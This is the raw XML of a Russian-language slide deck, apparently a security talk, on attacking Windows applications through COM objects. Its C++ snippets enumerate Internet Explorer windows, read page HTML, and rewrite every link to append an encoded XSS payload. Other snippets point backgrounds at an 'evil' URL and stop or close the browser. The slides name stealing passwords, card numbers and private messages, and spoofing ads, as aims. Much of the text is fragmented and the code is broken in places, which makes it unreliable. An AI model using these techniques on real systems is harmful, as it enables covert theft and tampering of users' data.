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4D95-80AA-4F86-978B-198E9AE81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1364-7B8E-4DFC-9ED0-51FFF71C74F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0849-95F8-4B6A-8312-66FD11D82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3931200"/>
            <a:ext cx="77724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6AF2-68EC-4A6F-90A1-3EBF7180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152388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39312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39312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A724-5CC7-41F1-A3E1-B8D27FE02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152388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152388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393120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393120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393120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6895-C13D-4E50-86A4-7A1E4D5A3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45C6-D156-4605-9947-F239B4DD3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15238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D464-2C3B-48FA-B618-118476F7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8423-3177-4703-A57E-1EF42325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3792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1523880"/>
            <a:ext cx="3792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A032-D310-45E6-ABCF-8CD1EA3E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FF6A-85EB-45A9-B6C1-A9F71AEF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282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F0AB-F396-4A29-8899-A613C856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1523880"/>
            <a:ext cx="3792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39312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8011-88F7-428E-B5D6-1D6852FF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15238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5998-582C-4C19-B0DF-C7971C23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3792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152388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39312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1CB7-8F16-4551-A3CA-FBA9772E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152388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3931200"/>
            <a:ext cx="77724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4441-69E6-4F56-979A-7C2A4C18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3931200"/>
            <a:ext cx="77724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9D91-09CA-447A-860F-2633C428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152388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39312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39312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4540-736B-4027-A2B0-F7A4B780D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152388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152388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393120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393120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393120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C419-BB07-4755-9249-75111E146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6DB5-88E2-43BA-B329-BF849982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3792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1523880"/>
            <a:ext cx="3792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E426-09F5-4322-AFA3-427ECC02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8EAD-66C4-44DA-9E0D-FB592451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282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E199-B77E-4E3C-99F8-DCD56F80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1523880"/>
            <a:ext cx="3792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39312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DFAF-AE7A-481A-84AB-C899B780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3792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52388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39312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8269-6FBA-4BDA-8902-FD0C2C97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152388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3931200"/>
            <a:ext cx="77724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B0EC-1532-4EF5-BACC-28A660EF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71748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717480"/>
            <a:ext cx="32832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13976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13976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06668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6094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400040"/>
            <a:ext cx="8226360" cy="3204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5238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458C-D167-41D2-BD97-2642C2A60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15238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5B7B-F5F1-4B33-9FBE-BA9541F1B969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ail@alisa.in" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:mail@alisa.in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93" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://ru.wikipedia.org/wiki/OLE" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://ru.wikipedia.org/wiki/Microsoft_Office" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://ru.wikipedia.org/wiki/Microsoft_Excel" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://ru.wikipedia.org/wiki/Microsoft_Word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GUID" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://ru.wikipedia.org/wiki/COM-&#1080;&#1085;&#1090;&#1077;&#1088;&#1092;&#1077;&#1081;&#1089;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Windows_API" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://ru.wikipedia.org/wiki/MFC" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://ru.wikipedia.org/w/index.php?title=Active_Template_Library&amp;action=edit" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://ru.wikipedia.org/w/index.php?title=Windows_Template_Library&amp;action=edit" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://ru.wikipedia.org/wiki/C%2B%2B" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://ru.wikipedia.org/wiki/Microsoft_.NET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96" TargetMode="External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hyperlink" Target="http://ru.wikipedia.org/w/index.php?title=DCE/RPC&amp;action=edit" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://ru.wikipedia.org/wiki/Remote_procedure_call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71720" y="49968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ерехват управления приложений, чтение и подмена пользовательского контента в приложениях при помощи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M Objects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43040" y="3857400"/>
            <a:ext cx="64008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lousova Alis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mail@alisa.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ischuk Karim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mail@ori0n.cc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олучение указателя на известный метод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аще всего нужный нам указатель на метод, нам известен заранее,  его можно получить, используя функцию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SIDFromProgID()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связк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tActiveObject()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пример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SIDFromProgID(L"VisualStudio.DTE", &amp;clsid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Unknown *pUnk = GetActiveObject(clsid0, NULL, (IUnknown**)&amp;pUnk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nk-&gt;QueryInterface(IID_IDispatch, (void **)&amp;pDisp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ComPtr&lt;EnvDTE::_DTE&gt; pDT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DTE.CoCreateInstance(clsid0, 0, CLSCTX_LOCAL_SERVER)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мер в приложении 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олучение указателя на зарезервированный в системе метод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ли использовать уже зарезервированные в систем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 Objects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например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CreateInstance(CLSID_Messenger, NULL, CLSCTX_ALL, IID_IMessenger, (void **)&amp;pIMessenge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CreateInstance(CLSID_ShellWindows, NULL, CLSCTX_ALL, IID_IShellWindows, (void**)&amp;spShWin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ерехват данны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посредственный перехват данных может быть реализован несколькими способами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посредственным чтением данных, используя имеющийся набор методов подключенного интерфейса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Дизассемблирование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имен метод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ля этого могут подойти встроенные средства  в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isual Studio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T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,  та же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DA Pro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, т.п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росмотр  документаци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Это руководства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SDN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,  файлы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DK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, сторонни  исследования в этой област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олучения методов интерфейса, через стандартный набор функций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ассмотрим ниже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…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олучения методов интерфейса, через стандартный набор функций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IDsOfNames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) - Преобразует имена методов (свойств) в их идентификаторы. Пример, в приложении  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TypeInfoCount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) – Возвращает число описаний типа в библиотеке тип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TypeInfo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) – возвращается указатель на интерфейс  ITypeInf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аленький пример демонстрирующий получения информации о типе TKIND_INTERFACE для дуального интерфейс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tlib-&gt;GetTypeInfo((unsigned int) dwlndex,  &amp;ptypeinfoDisp)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typeinfoDisp-&gt;GetRefTypeOfImplType(-1, &amp;phreftype)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typeinfoDisp-&gt;GetRefTypeInfo(phreftype,  &amp;ptypeinfoln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Invoke() – Предоставляет доступ к свойствам и методам  объект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Создание собственных методов перехвата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бъектов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5480" y="1523880"/>
            <a:ext cx="86691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ще одним способом Технология “перехвата” вызовов API функций,  может быть применена и в перехвате методов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ъектов, так называемая “техника проксирования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ъектов”, она хорошо описана в Иваном Адреевым в статье “ Перехват методов COM интерфейсов”, которую можно прочесть по адресу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http://rsdn.ru/article/com/comintercept.xml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.  Для этого используются функциями CoGetInterceptor(), CoGetInterceptorFromTypeInfo(), создают перехватчик для заданного интерфейса, специальные интерфейсы ICallFrame и ICallFrameWalker обеспечивают доступ к переданным в вызов метода in и out параметрам, что позволяет “найти” все указатели на интерфейсы среди параметров стека вызова.  Принцип технологии заключается в том, что вызов клиента перенаправляется (с помощью различных технических ухищрений - замена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TBL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xy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объект и т.п.) сначала коду заместителя, который выполняет пред- и постобработку, а затем уже – исходному объекту. Благодаря этому можно добавлять новую функциональность, никак не изменяя ни код клиента, ни код сервер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рафическое приме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етод собственных перехват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Рисунок 3" descr="comintercept_call_intercept.JPG"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1643040" y="2214720"/>
            <a:ext cx="55720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ерехват интерфейсов, не совместимых с autom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56760" y="1523880"/>
            <a:ext cx="85978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 того же автора есть, еще одна статья “Перехват интерфейсов, не совместимых с automation”, адрес которой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http://rsdn.ru/article/com/comintercept2.xml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ак как функция CoGetIntercptor() не умеет работать с не oleautomation-совместимыми интерфейсами, в результате перехват таких интерфейсов как  IStream, IEnumVARIANT и т.д. не возможен.  Чтобы обойти проблему перехвата не совместимых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on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 можно воспользоваться двумя методам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ерехват интерфейсов, не совместимых с autom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хват с помощью IRpcChannelBuffer - Перед вызовом каждого метода интерфейса через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управление получает наша реализация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RpcChannelBuffer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Receive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Поместив в этот метод код для обработки передаваемых параметров, мы получим перехватчик, способный работать практически с любыми интерфейсам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ализация перехватчика на основе NDR RPC Format Strings – В этом методе используются недокументированные функции CreateProxyFromTypeInfo() и CreateStubFromTypeInfo(), так как для automation-интерфейсов вызовы IPsFactoryBuffer::CreateProxy и IPsFactoryBuffer::CreateStub нельзя будет получить информацию об интерфейсе – proc format string и type format st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Результаты перехва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результате получившегося набор для управления, чтение и записи нужный на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нтерфейс,  у нас появляется возможность чтение данных пользователя, которые идут через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ъект приложения в котором этот пользователь работает, изменять эти данные незаметно для пользователя и передающей стороны, иногда можно перехватывать управление,  например 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Explorer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look Express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oft Office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N messager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ahoo messager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sial Studio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и т.п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иды атаки на приложения с помощью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M Object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Перехват управления приложением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Получения контента приложени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Изменение контента приложени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Вступление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;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водная о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/D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лучение указателя на методы интерфейса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ъект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дключение к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терфейсу через найденный указател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ехват данных через подключенный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терфейс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меры реализаци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SV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олучение контента приложе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бор трафика в программах, которые работают с сетью и  использующи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терфейс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пример в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Explorer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бор трафика содержащего личные данные, такие как пароли, номера кредитных карт, банковские реквизиты, личная переписка. Достаточно написать несколько строчек когд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ример, получение контента приложе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5480" y="1523520"/>
            <a:ext cx="866916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дключаемся к интерфейсу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ShellWindows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кон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xplorer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ComPtr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ShellWindows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pShWin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;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pShWin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CreateInstance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(…..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лучаем список окон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spShWin-&gt;get_Count( &amp;nCount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оверяем принадлежность этих окон к браузеру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net Explore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ComPtr&lt;IDispatch&gt; pDisp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pShWin-&gt;Item ( CComVariant ( i ), &amp;pDisp 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ComQIPtr&lt;IWebBrowser2&gt; pIE( pDisp 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f ( pIE != NULL ) {………..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лучаем содержимое загруженной веб страницы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ComPtr&lt;IDispatch&gt; pDispDoc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IE-&gt;get_Document ( &amp;pDispDoc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HTMLDocument2* pHTMLDocumen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DispDoc-&gt;QueryInterface ( IID_IHTMLDocument2, (void**)&amp;pHTMLDocument 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ComPtr&lt;IHTMLElement&gt; pHTMLElemen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TMLDocument-&gt;get_body ( &amp;pHTMLElement ) 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STR bstrHtml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TMLElement-&gt;get_innerHTML ( &amp;bstrHtml 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PTSTR lpstrHtml = NULL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pstrHtml = W2T ( bstrHtml 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intf (“Html page text: %s \n”, lpstrHtml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Изменения контента прилож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5480" y="1523520"/>
            <a:ext cx="866916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Теперь  давайте изменим содержимое окна браузера. Чтобы не парсить вручную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теги, воспользуемся готовыми функциями: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_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WebBrowser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-&gt;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get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_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Document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(&amp;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HtmlDocDispatch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)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HtmlDocDispatch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-&gt;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QueryInterface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IID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_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IHTMLDocument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2, (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void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**)&amp;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HtmlDoc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)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IHTMLElementCollection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Coll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NULL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HtmlDoc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-&gt;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get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_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all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(&amp;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Coll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)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long nLength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= 0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Coll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-&gt;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get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_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length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(&amp;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nLength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)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for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int i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= 0;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&lt;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nLength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++)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{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COleVariant vIdx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((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long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VT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_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4); //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VT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_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4 –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string type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IDispatch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ElemDispatch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NULL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IHTMLElement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*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Elem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NULL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Coll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-&gt;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item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vIdx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vIdx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, &amp;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ElemDispatch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)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ElemDispatch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-&gt;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QueryInterface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IID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_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IHTMLElement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, (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void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**)&amp;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Elem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)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BSTR bstrTagName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LPTSTR lpstrHtml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NULL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Elem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-&gt;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get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_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tagName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 (&amp;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bstrTagName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)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lpstrHtml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bstrTagName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);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rintf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(“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Html tag name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: %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\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”,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lpstrHtml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)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if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(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strstr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lpstrHtml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, “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href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”) ){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IHTMLLinkElement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LinkElement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NULL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ElemDispatch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-&gt;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QueryInterface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IID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_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IHTMLLinkElement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, (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void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**)&amp;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LinkElement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);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BSTR bstrHref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LPTSTR lpstrHref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NULL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LinkElement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-&gt;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get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_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href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(&amp;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bstrHref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)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lpstrHref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bstrHref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);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rintf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(“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Html tag Href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: %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\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”,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lpstrHref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);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}}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оследствия изменения контента приложе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28760" y="1523880"/>
            <a:ext cx="85262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писок всех имеющихся элементов и описание их методов, есть в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SDN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, теперь давайте подменим, значение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ref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, тоесть всех ссылок на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eb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транице, которую просматривает пользователь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ля этого сразу после строки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pstrHref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strHref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);  добавляем к полученому значению, нашу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SS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(Сross Site Sсriрting) атаку или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RL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о которому будет заготовленный скрипт инфицирующий пользователя, после чего вернет управление по нужному адресу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*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eEvil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 soEvil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[] = ”#&l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MG SRC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=&amp;#106;&amp;#97;&amp;#118;&amp;#97;&amp;#115;&amp;#99;&amp;#114;&amp;#105;&amp;#112;&amp;#116;&amp;#58;&amp;#97;&amp;#108;&amp;#101;&amp;#114;&amp;#116;&amp;#40;&amp;#39;&amp;#88;&amp;#83;&amp;#83;&amp;#39;&amp;#41;&gt;”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 itLen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len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()*2 +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Evil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+ 256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eEvil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*)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lloc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Len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)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_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nprintf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eEvil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Len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-1, “%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%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”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pstrHref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Evil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ComBSTR strEvil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eEvil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kElement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t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_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ref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(&amp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Evil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мер подмены контен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14200" y="1523520"/>
            <a:ext cx="87408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наглядности можно менять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ckground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ждой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раницы. Как видно из примеров, можно менять любой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лемент, таким же образом происходит работа и с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ML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окументами, если идет речь о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AP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раницах. Одним из полезных интерфейсов является IHTMLTxtRange, его методы позволяют искать текст, подсчитывать кол-во повторений строк текста, копировать, заменять, выделять, перемещать, короче говоря производить различные манипуляции с текстом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VARIANT v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 v.intVT = 6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 short * s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 IHTMLTxtRange-&gt;execCommand(L"fontsize", false, v, s)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мер подмены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ckground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El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-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eryInterface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ID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_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HTMLBodyElement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,     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d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**)&amp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BodyEl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))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BodyEl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-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t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_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ckground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://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vil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vil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if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")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ожно менять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держимое в зависимости от ситуации, от ее наполнения, времени суток и пользователя и его уровня доступа в системе.  Один из возможных видов атак является подмена котекстной рекламы, что кстати последнее время стало часто встречаться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Методы использующиеся в реализации подмены контент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56760" y="1523520"/>
            <a:ext cx="859788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DocumentFragment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Представляет часть дерева (хорошо подходит для операций Вырезать/Вставить)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Document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Представляет узел верхнего уровня в дереве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NodeList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Объект-итератор для доступа к узлам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TML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Node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Расширяет базовое понятие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помеченного элемента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(tagged element) в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TML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NamedNodeMap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Поддержка пространства имён и итерации для коллекций атрибутов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CharacterData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Объект для манипулирования текстом Attr Представляет атрибут(ы) элемент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Element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Узел, представляющий элемент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(удобен для доступа к атрибутам)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Представляет текст, содержащийся в элементе или атрибут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ComPtr&lt;IHTMLElement&gt;spEl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Disp-&gt;QueryInterface(IID_IDispatch, (LPVOID*)&amp;spEl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STR tag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l-&gt;get_tagName(&amp;tag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мер управления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I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CComPtr&lt;IShellWindows&gt; spShWin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if ( FAILED ( spShWin.CoCreateInstanc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( __uuidof ( ShellWindows ) ) ) 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throw printf ( 0,"Couldn't create object SHDocVW::ShellWindows\n" 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LONG nCoun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spShWin-&gt;get_Count( &amp;nCount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Tahoma"/>
              </a:rPr>
              <a:t>for ( int i=0; i&lt;nCount; i++ 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n-NO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CComPtr&lt;IDispatch&gt; pDisp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spShWin-&gt;Item ( CComVariant ( i ), &amp;pDisp )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CComQIPtr&lt;IWebBrowser2&gt; pIE( pDisp )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pIE-&gt;Stop()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pIE-&gt;Refresh()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pIE-&gt;Quit()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имер обработки событий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История CO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андарт COM был разработан в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1993 году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омпанией Майкрософт как основа для развития технологии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OLE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Технология OLE 1.0 уже позволяла создавать т. н. «составные документы» например, в пакете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Microsoft Office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эта технология позволяла включать диаграммы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Microsoft Excel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 документы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Microsoft Wor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андарт же COM должен был унифицировать процесс создания, внедрения и связывания таких внедряемых объектов, а также стандартизировать разработку приложений, использующих внедряемые объект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инципы работы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5840" y="1500120"/>
            <a:ext cx="85010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сновным понятием, которым оперирует технология COM, является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COM-компонент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Программы, построенные на технологии COM, фактически не являются автономными программами, а представляют собой набор взаимодействующих между собой COM-компонентов. Каждый компонент имеет уникальный идентификатор (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GUID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) и может одновременно использоваться многими программами. Компонент взаимодействует с другими программами через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COM-интерфейсы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— наборы абстрактных функций и свойств. Каждый COM-компонент должен, как минимум, поддерживать стандартный интерфейс «IUnknown», который предоставляет базовые средства для работы с компонент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M/DCOM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и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indows AP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indows API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редоставляет базовые функции, позволяющие использовать COM-компоненты. Библиотеки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MFC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и, особенно,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ATL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WTL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редоставляют гораздо более гибкие и удобные средства для работы с COM. Библиотека ATL от Майкрософт до сих пор остаётся самым популярным средством создания COM-компонентов. Но, зачастую, COM-разработка остаётся ещё довольно сложным делом, программистам приходится вручную выполнять многие рутинные задачи, связанные с COM (особенно это заметно в случае разработки на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C++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). Впоследствии (в технологиях COM+ и особенно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.NET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) Майкрософт попыталась упростить задачу разработки COM-компонент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Развитие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пущенная в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1996 году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технология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DCOM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англ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Distributed COM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— распределённая COM) основана на технологии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DCE/RPC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разновидности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RPC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) и является развитием COM. DCOM позволяет COM-компонентам взаимодействовать друг с другом по сети. Главным конкурентом DCOM является другая известная распределённая технология — CORB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составе Windows 2000 была выпущена технология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COM+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которая расширяла возможности разработчиков COM-компонентов, предоставляя им некоторые готовые услуг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улучшенную поддержку потоков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оступ к контексту, в котором выполняется компонент (например, компоненты, используемые в ASP, могут с этой возможностью получить доступ к внутренним объектам той страницы, на которой они выполняются)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.NET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и будущее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2002 году была официально выпущена платформа Microsoft .NET, которая на сегодняшний день объявлена Майкрософт рекомендуемой основой для создания приложений и компонентов под Windows. По этой причине в .NET включены и средства, позволяющие обращаться к компонентам COM из приложений .NET, и наоборот. По словам представителей Майкрософт, COM (точнее, COM+) и .NET являются отлично взаимодополняющими технологиями. Также было заявлено, что Windows Vista будет построена с использованием технологий .NET и COM+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oofing by COM Object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ольшое количество программного обеспечения имеет в своем распоряжении интерфейс управления и передачи данных, при помощ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 Сomponent Object Model ) объект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ехват данных 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 Objects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водится к трем основным этапам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лучение указателя на методы интерфейса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ъект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дключение к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терфейсу через найденный указател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хват данных через подключенный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терфейс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ерехват методов интерфейса IUnknow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85880" y="171432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тобы получить не известный нам указатель на нужный метод, можно воспользоваться методом, который описан Алексей Остапенко  в статье “ Перехват методов интерфейса IUnknown”, по адресу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http://www.rsdn.ru/article/com/qihook.xml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 Суть этого подхода заключается в замене указателей на функции QueryInterace, AddRef, Release в VTBL интерфейса и выполнении дополнительной обработки внутри перехватчик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ак как интерфейс  IUnknown является базовым интерфейсом для COM/DCOM и все интерфейсы являются его наследниками, то мы можем получить доступ к любому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ъекту в приделах доступа по DACL  (Discretionary Access-Control List). В результате IUnknown  и даст необходимый нам указатель  на метод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04:26:47Z</dcterms:created>
  <dc:creator>Dan Berger</dc:creator>
  <dc:description/>
  <dc:language>en-US</dc:language>
  <cp:lastModifiedBy>alice</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2007-12-01T10:40:31Z</dcterms:modified>
  <cp:revision>135</cp:revision>
  <dc:subject/>
  <dc:title>COM: A Brief Introduction</dc:title>
</cp:coreProperties>
</file>